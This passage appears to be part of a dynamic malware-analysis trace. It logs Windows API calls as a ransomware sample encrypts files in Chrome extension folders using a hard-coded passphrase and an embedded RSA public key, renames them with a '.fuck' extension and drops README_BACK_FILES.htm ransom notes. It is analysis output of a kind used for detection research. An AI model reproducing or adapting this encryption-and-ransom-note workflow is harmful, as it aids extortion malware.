lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x7a, lpOverlapped=0x0) returned 1 [0259.997] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x7a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x80) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0259.998] CloseHandle (hObject=0x5d64) returned 1 [0259.998] CloseHandle (hObject=0x5d60) returned 1 [0259.998] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0260.000] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0260.000] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0260.001] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0260.002] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.002] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0260.002] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0260.003] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0260.003] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0260.003] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0260.003] AreFileApisANSI () returned 1 [0260.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0260.003] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0260.003] GetFileType (hFile=0x5d50) returned 0x1 [0260.004] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0260.005] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0260.005] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0260.005] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\readme_back_files.htm")) returned 0xffffffff [0260.005] AreFileApisANSI () returned 1 [0260.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 145 [0260.005] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0260.006] GetFileType (hFile=0x5d4c) returned 0x1 [0260.006] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0260.007] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0260.007] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0260.007] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\readme_back_files.htm")) returned 0xffffffff [0260.007] AreFileApisANSI () returned 1 [0260.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e1a4e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0260.007] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0260.008] GetFileType (hFile=0x5d40) returned 0x1 [0260.008] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0260.009] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0260.009] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fb00 [0260.009] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0260.009] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0260.009] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e7fbc0 [0260.011] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0260.011] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0260.011] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0260.011] GetLastError () returned 0x0 [0260.011] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png")) returned 0x20 [0260.011] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png", dwFileAttributes=0x80) returned 1 [0260.012] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0260.013] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.014] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg", dwFileAttributes=0x2) returned 1 [0260.014] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0260.016] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0260.016] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.016] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.016] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0260.016] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.016] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0260.016] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e6e868) returned 1 [0260.016] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e868, dwCertEncodingType=0x1, pInfo=0x2e274c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e274f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e274f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7c440) returned 1 [0260.016] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0260.016] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6eb98*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e6eb98*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0260.017] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6eb98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e6eb98*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0260.019] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.028] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0260.028] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.037] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.037] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0260.037] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.037] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.037] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0260.037] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.037] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.037] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0260.038] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.038] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.038] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0260.038] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.038] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.038] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0260.038] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0260.038] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x30f, lpOverlapped=0x0) returned 1 [0260.038] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x30f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x310) returned 1 [0260.038] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x310, lpOverlapped=0x0) returned 1 [0260.038] CloseHandle (hObject=0x5d50) returned 1 [0260.038] CloseHandle (hObject=0x5d60) returned 1 [0260.038] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), bFailIfExists=0) returned 1 [0260.041] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png", dwFileAttributes=0x0) returned 1 [0260.041] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.gsg")) returned 1 [0260.042] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.fuck")) returned 1 [0260.044] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0260.044] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0260.044] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0260.044] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0260.044] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0260.044] GetLastError () returned 0x0 [0260.044] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json")) returned 0x20 [0260.044] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0260.045] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 